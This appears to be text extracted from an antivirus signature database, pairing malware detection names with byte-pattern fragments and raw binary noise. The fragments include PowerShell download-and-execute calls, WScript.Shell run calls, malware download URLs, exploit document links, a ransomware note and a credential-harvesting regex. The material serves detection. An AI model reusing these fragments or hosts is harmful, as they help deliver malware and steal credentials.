target=\"https://http://bit.do/fq3bf\"targetmode=\"external\" ;target=\"https://http://bit.do/fq3bf\"targetmode=\"external\" \"!#SCPT:Trojan:HTML/Phish.RVAD3!MTB )h\"!#SCPT:Trojan:HTML/Phish.RVAD3!MTB cj8iiksmcx7fskpozwvc2nyaxb0pg=='))</script></body></html> ;cj8iiksmcx7fskpozwvc2nyaxb0pg=='))</script></body></html> \"!#SCPT:TrojanDropper:VBS/Ploty.CS1 )h\"!#SCPT:TrojanDropper:VBS/Ploty.CS1 .createobject(!$$$$!\"\" ;.createobject(!$$$$!\"\" 'wscript.shell!$$$$!\"\" ').run(p) \"!#SCRIPT:Exploit:Win32/Pdfjsc.NX.1 )h\"!#SCRIPT:Exploit:Win32/Pdfjsc.NX.1 a='aw';b='ls';c=2011;d='eplace';e='subs';m=8*2;z='this.'; ;a='aw';b='ls';c=2011;d='eplace';e='subs';m=8*2;z='this.'; \"!#SCRIPT:HTML/PossiblePhishClass.A )h\"!#SCRIPT:HTML/PossiblePhishClass.A <aclass=\" ;<aclass=\" 0\"id=\" 0\"href=\"https://office.live.com/start/ )h\"!#SCRIPT:PowerShell/IEXDownloadStr ;iex( net.webclient).downloadstring( \"!#SCRIPT:PowerShell/Internaloff.G4 )h\"!#SCRIPT:PowerShell/Internaloff.G4 =[system.security.cryptography.hmacmd5]::new([byte[]] ;=[system.security.cryptography.hmacmd5]::new([byte[]] \"!#TrojanDropper:VBS/Dridex.A!atb01 )h\"!#TrojanDropper:VBS/Dridex.A!atb01 #!#SCPT:Trojan:Win32/WinLNK.PFD1!lnk )h#!#SCPT:Trojan:Win32/WinLNK.PFD1!lnk childitem\"c:\\users\\$($env:username)\\appdata\\local\\temp\") :childitem\"c:\\users\\$($env:username)\\appdata\\local\\temp\") )h#!#SCRIPT:Exploit:Win32/Pdfjsc.AGR.1 =\"%\";poete=(\"l :=\"%\";poete=(\"l )h#!#SCRIPT:JS/TechUnloadBrowserCode.A window.onbeforeunload=function(){if(popit==true){return\" :window.onbeforeunload=function(){if(popit==true){return\" $!#SCPT:JS/Obfuscator.Split.WScript.D )h$!#SCPT:JS/Obfuscator.Split.WScript.D 9](\"w $!#SCPT:O97M/CVE-2017-11882.RTOIR!MTB )h$!#SCPT:O97M/CVE-2017-11882.RTOIR!MTB membranehartebeest.org/v/a59xkty2t8jndet.exe 9membranehartebeest.org/v/a59xkty2t8jndet.exe %!#Ransom:PowerShell/PowerWare.SK2!MTB )h%!#Ransom:PowerShell/PowerWare.SK2!MTB *warning*****</h2><p>wehaveacopyofallyouroriginalfiles 8*warning*****</h2><p>wehaveacopyofallyouroriginalfiles %!#SCPT:TrojanDownloader:VBS/Tnega.SP2 )h%!#SCPT:TrojanDownloader:VBS/Tnega.SP2 8=createobject(\"wscript.shell\") =\"objs\"+\"hell.e\"+\"xec %!#SCPT:TrojanDownloader:XML/Dridex.P8 )h%!#SCPT:TrojanDownloader:XML/Dridex.P8 [\"concat\"]([\"l\",\"l\",\"d\",\".\"][\"reverse\"]()[\"join\"](\"\")) 8[\"concat\"]([\"l\",\"l\",\"d\",\".\"][\"reverse\"]()[\"join\"](\"\")) %!#SCRIPT:Python/ParamikaPolicy.A1!MTB )h%!#SCRIPT:Python/ParamikaPolicy.A1!MTB .set_missing_host_key_policy(paramiko.autoaddpolicy()) 8.set_missing_host_key_policy(paramiko.autoaddpolicy()) %!#SCRIPT:Worm:Win32/Forbix.A!lnk!atb1 )h%!#SCRIPT:Worm:Win32/Forbix.A!lnk!atb1 startwscript/e:vbscript.encodemanuel.doc&start 8startwscript/e:vbscript.encodemanuel.doc&start &exit %!#TrojanDownloader:Linux/miner.Z2!MTB )h%!#TrojanDownloader:Linux/miner.Z2!MTB crazydavesslots.com/.pprt-o/tmp/python/pprt&&chmod0777 8crazydavesslots.com/.pprt-o/tmp/python/pprt&&chmod0777 %!#TrojanDownloader:O97M/Dornoe.H!shb0 )h%!#TrojanDownloader:O97M/Dornoe.H!shb0 .downloadfile(\"http 8.downloadfile(\"http `.ps1\",\"c:\\users\\public\\ .ps1\" %!#TrojanDownloader:O97M/Mratmc.A1!MTB )h%!#TrojanDownloader:O97M/Mratmc.A1!MTB 8+=string.fromcharcode(parseint( ,2),16)); )h&!#SCPT:BrowserModifier:Win32/Hopadef.A \\hprewriter\\rewriterrunner.exe%homedrive%%homepath%30 7\\hprewriter\\rewriterrunner.exe%homedrive%%homepath%30 &!#SCPT:CodeOnly.DecodeEvalAndSessionId )h&!#SCPT:CodeOnly.DecodeEvalAndSessionId };'); 7};'); );eval( );var etsessionid &!#SCPT:Exploit:O97M/CVE-2017-11882.BX2 )h&!#SCPT:Exploit:O97M/CVE-2017-11882.BX2 7772792@nimvcnoriopogdzr@-xbibckgxok5oslp9f<eh&&0m-d_ 77772792@nimvcnoriopogdzr@-xbibckgxok5oslp9f<eh&&0m-d_ &!#SCPT:Exploit:O97M/CVE-2017-11882.SS1 )h&!#SCPT:Exploit:O97M/CVE-2017-11882.SS1 target=\"https://itsssl.com/9h7cn\"targetmode=\"external 7target=\"https://itsssl.com/9h7cn\"targetmode=\"external target=\"https://itsssl.com/vlafv\"targetmode=\"external 7target=\"https://itsssl.com/vlafv\"targetmode=\"external &!#SCPT:Trojan:PowerShell/AVSignature.C )h&!#SCPT:Trojan:PowerShell/AVSignature.C $outfile=join-path$outpath\"$($filename)_$($splitbyte) 7$outfile=join-path$outpath\"$($filename)_$($splitbyte) &!#SCPT:TrojanDownloader:BAT/Obfuse.RD3 )h&!#SCPT:TrojanDownloader:BAT/Obfuse.RD3 startwscript//nologo%userprofile%\\temp\\%username%.vbs 7startwscript//nologo%userprofile%\\temp\\%username%.vbs &!#SCPT:TrojanDownloader:JS/Nemucod.BA3 )h&!#SCPT:TrojanDownloader:JS/Nemucod.BA3 .position=0; 7.position=0; =true;}}finally{ &!#TrojanDownloader:JS/Elshutilo.C!atb2 )h&!#TrojanDownloader:JS/Elshutilo.C!atb2 7.open(\"get\", P.run(\"schtasks.exe/delete/tn &!#TrojanDownloader:JS/Nemucod!ccee92_3 )h&!#TrojanDownloader:JS/Nemucod!ccee92_3 functiongreezno(){return'counqwter'.replace(/qw/g,\"\") 7functiongreezno(){return'counqwter'.replace(/qw/g,\"\") '!#ALF:Exploit:O97M/CVE-2017-0199.BK!MTB )h'!#ALF:Exploit:O97M/CVE-2017-0199.BK!MTB target=\"https://yerl.org/ 6target=\"https://yerl.org/ \"targetmode=\"external\"/> '!#SCPT:Exploit:JS/DonxRef!check_msie_03 )h'!#SCPT:Exploit:JS/DonxRef!check_msie_03 if(wmck>17006&&wmck<17011) 6if(wmck>17006&&wmck<17011) {if(kaka.indexof msie '!#SCPT:Exploit:O97M/CVE-2017-11882.SS50 )h'!#SCPT:Exploit:O97M/CVE-2017-11882.SS50 target=\"https://linkr.uk/fyu5r\"targetmode=\"external\" 6target=\"https://linkr.uk/fyu5r\"targetmode=\"external\" '!#SCPT:HackTool:PowerShell/ImplantCore4 )h'!#SCPT:HackTool:PowerShell/ImplantCore4 [win32]::virtualprotect($ptr,[uint32]5,0x40,[ref]$b) 6[win32]::virtualprotect($ptr,[uint32]5,0x40,[ref]$b) '!#SCPT:HackTool:PowerShell/InvokeTater2 )h'!#SCPT:HackTool:PowerShell/InvokeTater2 $schedule_service=new-object-com(\"schedule.service\") 6$schedule_service=new-object-com(\"schedule.service\") '!#SCPT:TrojanDownloader:JS/Nemucod.JV10 )h'!#SCPT:TrojanDownloader:JS/Nemucod.JV10 \\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2e\\x53\\x68\\x65\\x6c\\x6c 6\\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2e\\x53\\x68\\x65\\x6c\\x6c '!#SCPT:TrojanDownloader:VBS/Banload.BU2 )h'!#SCPT:TrojanDownloader:VBS/Banload.BU2 +chr( 6+chr( )+chr( =replace( ,vbcrlf,\"\") (!#SCPT:Exploit:O97M/CVE-2017-11882.BXK14 )h(!#SCPT:Exploit:O97M/CVE-2017-11882.BXK14 50>369852$cv>it=i9|:%amd_>jn3%bm\\mpcp;=l\\kl13685.24 550>369852$cv>it=i9|:%amd_>jn3%bm\\mpcp;=l\\kl13685.24 (!#SCPT:TrojanDownloader:O97M/Dunoff.ST02 )h(!#SCPT:TrojanDownloader:O97M/Dunoff.ST02 5click enableediting buttonfromtheyellowbarabove (!#SCPT:TrojanDownloader:O97M/EncDoc.BXZ4 )h(!#SCPT:TrojanDownloader:O97M/EncDoc.BXZ4 https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html 5https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html (!#SCPT:TrojanDownloader:O97M/EncDoc.BXZ6 )h(!#SCPT:TrojanDownloader:O97M/EncDoc.BXZ6 https://storyofusstudios.com/n75oh9tzoyhz/lipa.html 5https://storyofusstudios.com/n75oh9tzoyhz/lipa.html (!#SCPT:TrojanDownloader:O97M/EncDoc.NRK9 )h(!#SCPT:TrojanDownloader:O97M/EncDoc.NRK9 <fbx=\"1\"> 5<fbx=\"1\"> !r\"&83+ -1&\"c\"&1</f> (!#SCRIPT:PowerShell/Mimikittenz.A!remote )h(!#SCRIPT:PowerShell/Mimikittenz.A!remote domainusername=.{1,52}&userpass=.{1,42}&machinetype 5domainusername=.{1,52}&userpass=.{1,42}&machinetype )!#SCPT:Exploit:O97M/CVE-2017-8570.AA1!MTB )h)!#SCPT:Exploit:O97M/CVE-2017-8570.AA1!MTB c:\\fakepath 4c:\\fakepath abctfhgxghghgh.sctabctfhgxghghgh.sct )!#SCPT:JS/Obfuscator.responseText.Split.B )h)!#SCPT:JS/Obfuscator.responseText.Split.B ==200){var 4==200){var .responsetext;var )!#SCPT:TrojanDownloader:O97M/EncDoc.SMWA5 )h)!#SCPT:TrojanDownloader:O97M/EncDoc.SMWA5 reg!https://securezalink.com/home.jpg/security.ocx 4reg!https://securezalink.com/home.jpg/security.ocx )!#SCPT:TrojanDownloader:O97M/Gozi.RV1!MTB )h)!#SCPT:TrojanDownloader:O97M/Gozi.RV1!MTB htp:/conesa.yuidlc\\qkdirjfqwegknf,rgsvulmotaxbwyhv 4htp:/conesa.yuidlc\\qkdirjfqwegknf,rgsvulmotaxbwyhv )!#SCRIPT:TrojanDownloader:JS/Nemucod.DG-2 )h)!#SCRIPT:TrojanDownloader:JS/Nemucod.DG-2 *pt.shell* 4*pt.shell* *scri*\";var 0*%te*mp%*\\\\* 0\",\"*\"); *!#ALF:SCPT:TrojanDownloader:JS/Nemucod.Y00 )h*!#ALF:SCPT:TrojanDownloader:JS/Nemucod.Y00 \"\\x5b\" 3\"\\x5b\" };var ;/*@cc_onfor( *!#SCPT:Exploit:O97M/CVE-2017-11882.PJS!MTB )h*!#SCPT:Exploit:O97M/CVE-2017-11882.PJS!MTB {\\rtf12309\\page@429876590876543459876543!#$%dg3@5 3{\\rtf12309\\page@429876590876543459876543!#$%dg3@5 *!#SCPT:Exploit:O97M/CVE-2017-11882.SS1!MTB )h*!#SCPT:Exploit:O97M/CVE-2017-11882.SS1!MTB {\\rtf06236\\page21[.vbakbd@j=a'3c9sh8?gns[vgn/!b98 3{\\rtf06236\\page21[.vbakbd@j=a'3c9sh8?gns[vgn/!b98 *!#SCPT:Exploit:O97M/CVE-2017-8570.PRG5!MTB )h*!#SCPT:Exploit:O97M/CVE-2017-8570.PRG5!MTB (strsaveto)\"yty\"md\"tgrighirh\"c\"ytyfsdfsdfsdgfdg() 3(strsaveto)\"yty\"md\"tgrighirh\"c\"ytyfsdfsdfsdgfdg() *!#SCPT:Trojan:PowerShell/MicrophoneAudio.E )h*!#SCPT:Trojan:PowerShell/MicrophoneAudio.E .invoke(\"opennewtypewaveaudioalias$alias\",'',0,0) 3.invoke(\"opennewtypewaveaudioalias$alias\",'',0,0) *!#SCPT:TrojanDownloader:BAT/Powrar.YA1!MTB )h*!#SCPT:TrojanDownloader:BAT/Powrar.YA1!MTB \\winrar\\winrar.exe\"x-y-c\"%userprofile%\\downloads\\ 3\\winrar\\winrar.exe\"x-y-c\"%userprofile%\\downloads\\ *!#SCPT:TrojanDownloader:JS/Nemucod.SS4!MTB )h*!#SCPT:TrojanDownloader:JS/Nemucod.SS4!MTB 3.write .responsebody>> .position *!#SCPT:TrojanDownloader:JS/Obfuse.PJT4!MTB )h*!#SCPT:TrojanDownloader:JS/Obfuse.PJT4!MTB (qccelru.execquery(\"select*fromantivirusproduct\") 3(qccelru.execquery(\"select*fromantivirusproduct\") *!#SCPT:TrojanDownloader:PowerShell/Bynoco4 )h*!#SCPT:TrojanDownloader:PowerShell/Bynoco4 :#Lowfi:AGGR:Au3ModFileVersionHdrMalStats80 :#Lowfi:AGGR:Au3ModFileVersionHdrMalStats80U0 )#:1:z:2:NSIS_3_0_a2_zlib_solid-x86-unicode )#:1:z:2:NSIS_3_0_a2_zlib_solid-x86-unicodeU0L :#Lowfi:SCRIPT:Trojan:Win32/Jabonit.A_brute :#Lowfi:SCRIPT:Trojan:Win32/Jabonit.A_bruteU0 :#Lowfi:AGGR:HSTR:Win32/PossibleKeylogger.B :#Lowfi:AGGR:HSTR:Win32/PossibleKeylogger.BU0/ Y#PERSIST:LowFi:HackTool:Win32/HaDuFe.A!dha Y#PERSIST:LowFi:HackTool:Win32/HaDuFe.A!dhaU0W m :#Lowfi:Lua:ContextualDropFlashplayerLatest m :#Lowfi:Lua:ContextualDropFlashplayerLatestU0 !]#Lowfi:Rep:CMD:Trojan:Win32/BashPowerShell !]#Lowfi:Rep:CMD:Trojan:Win32/BashPowerShellU0 !:#LowFi:Adware:Win32/Kraddare!LikeyCleanPUS !:#LowFi:Adware:Win32/Kraddare!LikeyCleanPUSU04 }#Y#PERSIST:HSTR:Trojan:Win32/HarwickLike!dha }#Y#PERSIST:HSTR:Trojan:Win32/HarwickLike!dhaU0 #:#Lowfi:AGGREGATOR:Trojan:JS/Kilim!FB_lowfi $g2&:#Lowfi:PEMBAT:VirTool:Win32/Obfuscator.AKN #:#Lowfi:AGGREGATOR:Trojan:JS/Kilim!FB_lowfiU0$g2&:#Lowfi:PEMBAT:VirTool:Win32/Obfuscator.AKNU0 &)#:1:l:2:NSIS_3_0_b3_lzma_solid-x86-unicode &)#:1:l:2:NSIS_3_0_b3_lzma_solid-x86-unicodeU0 [(:#Lowfi:BRUTE:AdwareSafeSaver_ChromePlugin1 [(:#Lowfi:BRUTE:AdwareSafeSaver_ChromePlugin1U0 (Y#PERSIST:TrojanDropper:Win32/Scieron.A!dha (Y#PERSIST:TrojanDropper:Win32/Scieron.A!dhaU0 ):#LowFiSIGATTR:Trojan:Win32/DropBaitPidef.A ):#LowFiSIGATTR:Trojan:Win32/DropBaitPidef.AU0 [*:#Lowfi:HSTR:TrojanDownloader:Win32/Beebone [*:#Lowfi:HSTR:TrojanDownloader:Win32/BeeboneU0 ,)#:1:z:2:NSIS_3_0_b2_zlib_solid-x86-unicode ,)#:1:z:2:NSIS_3_0_b2_zlib_solid-x86-unicodeU0 -:#Lowfi:SCRIPT:TrojanClicker:JS/Faceliker.L ^AC.Y#PERSIST_ContextualDropPlugincontainerTemp -:#Lowfi:SCRIPT:TrojanClicker:JS/Faceliker.LU0^AC.Y#PERSIST_ContextualDropPlugincontainerTempU0P r/:#Lowfi:KCRC:VirTool:MSIL/GeneralPacker.S03 r/:#Lowfi:KCRC:VirTool:MSIL/GeneralPacker.S03U0* \\0:#Lowfi:Lua:WrittenToDesktopFolderByBrowser \\0:#Lowfi:Lua:WrittenToDesktopFolderByBrowserU0 1:#LowFiExp:Win32/ContextualDrop2JavawTempJc 1:#LowFiExp:Win32/ContextualDrop2JavawTempJcU0 1:#LowfiSIGATTR:VirTool:Win32/Obfuscator.AEL 1:#LowfiSIGATTR:VirTool:Win32/Obfuscator.AELU0# 2Y#PERSIST_TrojanDownloader:Win32/Brantall.A 2Y#PERSIST_TrojanDownloader:Win32/Brantall.AU0 2Y#PERSIST:HSTR:Program:Win32/AirInstaller.A 2Y#PERSIST:HSTR:Program:Win32/AirInstaller.AU0 5:#Lowfi:PEBMPAT:AntiEmuVirtualProtectLayout 5:#Lowfi:PEBMPAT:AntiEmuVirtualProtectLayoutU0 6:#Lowfi:Lua:WrittenToDesktopFolderByTorrent 6:#Lowfi:Lua:WrittenToDesktopFolderByTorrentU0|B 7]#LowFi:Behavior:Win32/ModRegServicesASEP.B 7]#LowFi:Behavior:Win32/ModRegServicesASEP.BU0 h8Y#PERSIST_ContextualModJavawTempLikeCorrupt h8Y#PERSIST_ContextualModJavawTempLikeCorruptU0c\t 9Y#PERSIST:HSTR:Backdoor:Win32/Lecna.gen!dha 9Y#PERSIST:HSTR:Backdoor:Win32/Lecna.gen!dhaU0W T:Y#PERSIST:HSTR:Trojan:Win32/SandySimBot!dha T:Y#PERSIST:HSTR:Trojan:Win32/SandySimBot!dhaU0 ~n;:#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S09 ~n;:#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S09U0 @]#LowFi:Behavior:Win32/ModRegServicesASEP.C @]#LowFi:Behavior:Win32/ModRegServicesASEP.CU0 3A)#:1:z:2:NSIS_3_0_a1_zlib_solid-x86-unicode 3A)#:1:z:2:NSIS_3_0_a1_zlib_solid-x86-unicodeU0 -dBY#PERSIST_TrojanDownloader:Win32/Brantall.D -dBY#PERSIST_TrojanDownloader:Win32/Brantall.DU0 DY#PERSIST:HSTR:HackTool:Win32/WDigest.B!dha DY#PERSIST:HSTR:HackTool:Win32/WDigest.B!dhaU0> F:#LowfiSIGATTR:VirTool:Win32/Obfuscator.AEM F:#LowfiSIGATTR:VirTool:Win32/Obfuscator.AEMU0 rK)#:1:l:2:NSIS_3_0_a0_lzma_solid-x86-unicode rK)#:1:l:2:NSIS_3_0_a0_lzma_solid-x86-unicodeU0M$ KY#PERSIST_TrojanDownloader:Win32/Putabmow.C KY#PERSIST_TrojanDownloader:Win32/Putabmow.CU0 bOY#PERSIST:Behavior:Win32/DocumentOpen.A!dha bOY#PERSIST:Behavior:Win32/DocumentOpen.A!dhaU0 R:#Lowfi:SCRIPT:Worm:VBS/Dunihi_usbspreading R:#Lowfi:SCRIPT:Worm:VBS/Dunihi_usbspreadingU0 S:#LowFi:HSTR:VirTool:Win32/Injector.FT_6_18 S:#LowFi:HSTR:VirTool:Win32/Injector.FT_6_18U0` T:#Lowfi:SCRIPT:TrojanDropper:Win32/Figyek.A T:#Lowfi:SCRIPT:TrojanDropper:Win32/Figyek.AU0Y RUY#PERSIST:Constructor:Python/Hitbrovi.A!dha RUY#PERSIST:Constructor:Python/Hitbrovi.A!dhaU0 ^eVY#PERSIST:HackTool:Win32/LSASecretsDump!dha ^eVY#PERSIST:HackTool:Win32/LSASecretsDump!dhaU0 uX:#Lowfi:KCRC:VirTool:MSIL/GeneralPacker.S02 uX:#Lowfi:KCRC:VirTool:MSIL/GeneralPacker.S02U0 YY#PERSIST:Lowfi:Backdoor:Win32/Hikiti.H!dha YY#PERSIST:Lowfi:Backdoor:Win32/Hikiti.H!dhaU0 Y:#LowfiTrojanDownloader:Java/OpenStream.ZZA Y:#LowfiTrojanDownloader:Java/OpenStream.ZZAU0b [:#Lowfi:SCRIPTLOWFI:Trojan:PHP/Redirector.H [:#Lowfi:SCRIPTLOWFI:Trojan:PHP/Redirector.HU0M [:#Lowfi:SCRIPT:Trojan:JS/DemocracySurveil.B [:#Lowfi:SCRIPT:Trojan:JS/DemocracySurveil.BU0 \\:#Lowfi:VirTool:Win32/Obfuscator.ADB_hashes \\:#Lowfi:VirTool:Win32/Obfuscator.ADB_hashesU0 @]Y#PERSIST_HSTR:VirTool:Win64/Obfuscator.AKO @]Y#PERSIST_HSTR:VirTool:Win64/Obfuscator.AKOU0^ \\^:#Lowfi:AGGREGATOR:REG/DisallowedCert_Avira \\^:#Lowfi:AGGREGATOR:REG/DisallowedCert_AviraU0 ^Y#PERSIST:TrojanDropper:Win32/Hokobot.A!dha ^Y#PERSIST:TrojanDropper:Win32/Hokobot.A!dhaU0 ^:#LowfiTrojanDownloader:Java/OpenStream.ZZE ^:#LowfiTrojanDownloader:Java/OpenStream.ZZEU0 De_Y#PERSIST:HackTool:Win64/LSASecretsDump!dha De_Y#PERSIST:HackTool:Win64/LSASecretsDump!dhaU0K$ _:#Lowfi:HSTR:Backdoor:MSIL/Hammertoss.A!dha _:#Lowfi:HSTR:Backdoor:MSIL/Hammertoss.A!dhaU0n a:#LowFi:Adware:MSIL/PlayBryte!LikeyCleanPUS a:#LowFi:Adware:MSIL/PlayBryte!LikeyCleanPUSU0+ b)#:0:b:2:NSIS_3_02_strlen_bzip2-x86-unicode b)#:0:b:2:NSIS_3_02_strlen_bzip2-x86-unicodeU0 c:#LowFiExp:Win32/ContextualDropJavaTempLike c:#LowFiExp:Win32/ContextualDropJavaTempLikeU0 h:#LowFi:KCRC:VirTool:Win32/AutoItInjectorZF h:#LowFi:KCRC:VirTool:Win32/AutoItInjectorZFU0 k:#Lowfi:AGGR:HSTR:Win32/PossibleKeylogger.C k:#Lowfi:AGGR:HSTR:Win32/PossibleKeylogger.CU0 /-m:#Lowfi:HSTR:Program:Darkcoin!LikeyCleanPUS /-m:#Lowfi:HSTR:Program:Darkcoin!LikeyCleanPUSU0 G^n]#LowFi:BMLua:AccessibilityEscalation.A!osk Op;oY#PERSIST:TrojanDropper:Win32/Scieron.B!dha G^n]#LowFi:BMLua:AccessibilityEscalation.A!oskU0Op;oY#PERSIST:TrojanDropper:Win32/Scieron.B!dhaU0 _ls:#LowFi:HSTR:Backdoor:Win32/Plugx!timecheck _ls:#LowFi:HSTR:Backdoor:Win32/Plugx!timecheckU0 t)#:1:z:2:NSIS_3_0_b1_zlib_solid-x86-unicode t)#:1:z:2:NSIS_3_0_b1_zlib_solid-x86-unicodeU0& {u:#LowFi:SCPT:TrojanDownloader:JS/Nemucod.ET {u:#LowFi:SCPT:TrojanDownloader:JS/Nemucod.ETU0 kyN#LowfiHSTR:SoftwareBundler:Win32/Prepscram kyN#LowfiHSTR:SoftwareBundler:Win32/PrepscramU0u ny]#LowFi:BMLua:AccessibilityEscalation.Z!osk ny]#LowFi:BMLua:AccessibilityEscalation.Z!oskU0 oy:#Lowfi:HSTR:Virtool:MSIL/Obfuscator.NetZ.A oy:#Lowfi:HSTR:Virtool:MSIL/Obfuscator.NetZ.AU0 zY#PERSIST:Lua:ContextExplorerZIPExtracted.A zY#PERSIST:Lua:ContextExplorerZIPExtracted.AU0 {:#LowFi:AGGR:TrojanDownloader:JS/Nemucod.DS {:#LowFi:AGGR:TrojanDownloader:JS/Nemucod.DSU0 ~)#:1:l:2:NSIS_3_0_b0_lzma_solid-x86-unicode ~)#:1:l:2:NSIS_3_0_b0_lzma_solid-x86-unicodeU0T) :#Lowfi:AGG:JS/Obfuscator.InnerScript.AAY.A :#Lowfi:AGG:JS/Obfuscator.InnerScript.AAY.AU0 :#LowFiExp:Win32/ContextualModJavawTempLike :#LowFiExp:Win32/ContextualModJavawTempLikeU0 Y#PERSIST:Lowfi:Backdoor:VBS/Brozerch.B!dha Y#PERSIST:Lowfi:Backdoor:VBS/Brozerch.B!dhaU0~ :#Lowfi:FileCreatedbySvchostLaunchSvchost.A :#Lowfi:FileCreatedbySvchostLaunchSvchost.AU0r :#Lowfi:AGGREGATOR:REG/DisallowedCert_AVast :#Lowfi:AGGREGATOR:REG/DisallowedCert_AVastU0 :#Lowfi:AGGR:HSTR:Win32/PossibleKeylogger.A :#Lowfi:AGGR:HSTR:Win32/PossibleKeylogger.AU0; :#Lowfi:Lua:TrojanDownloader:JS/Nemucod!ret :#Lowfi:Lua:TrojanDownloader:JS/Nemucod!retU0 :#Lowfi:HSTR:SoftwareBundler:Win32/Somoto.A :#Lowfi:HSTR:SoftwareBundler:Win32/Somoto.AU0bk2 Y#PERSIST:HSTR:HackTool:Win32/TranCee.A!dha Y#PERSIST:HSTR:HackTool:Win32/TranCee.A!dhaU03qL :#LowFi:SCRIPT:TrojanDownloader:VBS/Rtbot.A :#LowFi:SCRIPT:TrojanDownloader:VBS/Rtbot.AU0S :#LowfiREG/CompromisedCert_PSafe_Tecnologia :#LowfiREG/CompromisedCert_PSafe_TecnologiaU0 :#LowFi:SCPT:Exploit:JS/Meadgive.S_gen_main :#LowFi:SCPT:Exploit:JS/Meadgive.S_gen_mainU0 :#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S0C :#Lowfi:HSTR:VirTool:MSIL/GeneralPacker.S0CU0 :#Lowfi:BrowserModifier:Win32/KipodToolsCby :#Lowfi:BrowserModifier:Win32/KipodToolsCbyU0 )#:0:b:2:NSIS_3_01_strlen_bzip2-x86-unicode )#:0:b:2:NSIS_3_01_strlen_bzip2-x86-unicodeU0{:| :#Lowfi:AGGR:Au3ModFileVersionHdrMalStats70 :#Lowfi:AGGR:Au3ModFileVersionHdrMalStats70U0D :#Lowfi:PEPCODE:VirTool:Win32/Obfuscator.EH :#Lowfi:PEPCODE:VirTool:Win32/Obfuscator.EHU0 )#:1:l:2:NSIS_3_0_a2_lzma_solid-x86-unicode )#:1:l:2:NSIS_3_0_a2_lzma_solid-x86-unicodeU0VQm Y#PERSIST:Lowfi:Trojan:Win32/Salgorea.C!dha Y#PERSIST:Lowfi:Trojan:Win32/Salgorea.C!dhaU0 Y#PERSIST:HackTool:Win32/LSASecretsView!dha Y#PERSIST:HackTool:Win32/LSASecretsView!dhaU0 Y#PERSIST:TrojanDropper:Win32/Derusbi.C!dha Y#PERSIST:TrojanDropper:Win32/Derusbi.C!dhaU0C :#Lowfi:HSTR:VirTool:MSIL/ContrenreInjector :#Lowfi:HSTR:VirTool:MSIL/ContrenreInjectorU0& ]#LowFi:BMLua:AccessibilityEscalation.E!osk ]#LowFi:BMLua:AccessibilityEscalation.E!oskU0 :#Lowfi:HSTR:BrowserModifier:Win32/Neobar.D :#Lowfi:HSTR:BrowserModifier:Win32/Neobar.DU0s Y#PERSIST:HackTool:Win64/LSASecretsView!dha Y#PERSIST:HackTool:Win64/LSASecretsView!dhaU0 :#Lowfi:HSTR:Adware:Win32/PennyBeeLinkury.A :#Lowfi:HSTR:Adware:Win32/PennyBeeLinkury.AU0 :#Lowfi:PEBMPAT:Simda:AntiEmuTimeStampCheck :#Lowfi:PEBMPAT:Simda:AntiEmuTimeStampCheckU0 :#Lowfi:HSTR:Trojan:Win32/Kraziomel_bitcoin :#Lowfi:HSTR:Trojan:Win32/Kraziomel_bitcoinU0 ]#LowFi:BMLua:AccessibilityEscalation.D!osk ]#LowFi:BMLua:AccessibilityEscalation.D!oskU0 )#:1:l:2:NSIS_3_0_b2_lzma_solid-x86-unicode )#:1:l:2:NSIS_3_0_b2_lzma_solid-x86-unicodeU0- :#Lowfi:HSTR:Win32/Obfuscator.CrypterOnline :#Lowfi:HSTR:Win32/Obfuscator.CrypterOnlineU0P Y#PERSIST:HSTR:HackTool:Win32/Gabrielle!dha Y#PERSIST:HSTR:HackTool:Win32/Gabrielle!dhaU0 )#:1:z:2:NSIS_3_0_b3_zlib_solid-x86-unicode )#:1:z:2:NSIS_3_0_b3_zlib_solid-x86-unicodeU0 ]#LowFi:Behavior:Win32/ModRegServicesASEP.A ]#LowFi:Behavior:Win32/ModRegServicesASEP.AU0 :#LowfiSIGATTR:VirTool:Win32/Obfuscator.AEK :#LowfiSIGATTR:VirTool:Win32/Obfuscator.AEKU0 :#Lowfi:BRUTE:AdwareSafeSaver_ChromePlugin2 :#Lowfi:BRUTE:AdwareSafeSaver_ChromePlugin2U0[|S Y#PERSIST:HSTR:VirTool:Win32/Obfuscator.ALK Y#PERSIST:HSTR:VirTool:Win32/Obfuscator.ALKU05 :#Lowfi:SIGA:MSIL/Suspicious.CreateRunKey.B :#Lowfi:SIGA:MSIL/Suspicious.CreateRunKey.BU0 ]#ALF:BMLua:Win32/UacBypassLoadConnMgrDll.A ]#ALF:BMLua:Win32/UacBypassLoadConnMgrDll.AU0 :#Lowfi:SCPT:Trojan:PHP/CryptoPHP_injectPHP :#Lowfi:SCPT:Trojan:PHP/CryptoPHP_injectPHPU0 :#Lowfi:AGGR:SoftwareBundler:Win32/Somoto.A :#Lowfi:AGGR:SoftwareBundler:Win32/Somoto.AU0f :#LowfiSoftwareBundler:Win32/Protlerdob.ZZA :#LowfiSoftwareBundler:Win32/Protlerdob.ZZAU0q :#LowFi:Adware:Win32/Cashback!LikeyCleanPUS :#LowFi:Adware:Win32/Cashback!LikeyCleanPUSU0 :#Lowfi:SIGA:MSIL/Suspicious.HttpRequest.S1 :#Lowfi:SIGA:MSIL/Suspicious.HttpRequest.S1U0 )#:1:z:2:NSIS_3_0_a0_zlib_solid-x86-unicode )#:1:z:2:NSIS_3_0_a0_zlib_solid-x86-unicodeU0 :#LowFiExp:Win32/ContextualAccessJavaTempJc :#LowFiExp:Win32/ContextualAccessJavaTempJcU0| :#Lowfi:KCRC:VirTool:MSIL/GeneralPacker.S01 :#Lowfi:KCRC:VirTool:MSIL/GeneralPacker.S01U0 :#Lowfi:SCRIPT:Trojan:JS/DemocracySurveil.A :#Lowfi:SCRIPT:Trojan:JS/DemocracySurveil.AU0 :#LowFiSIGATTR:VirTool:Win32/Obfuscator.ADF :#LowFiSIGATTR:VirTool:Win32/Obfuscator.ADFU0k ]#LowFi:Behavior:Win32/DestructiveCMD.H!tel ]#LowFi:Behavior:Win32/DestructiveCMD.H!telU0 )#:1:l:2:NSIS_3_0_a1_lzma_solid-x86-unicode )#:1:l:2:NSIS_3_0_a1_lzma_solid-x86-unicodeU0L :#Lowfi:Lua:SuspiciousExeLegitNameInAppdata :#Lowfi:Lua:SuspiciousExeLegitNameInAppdataU0A 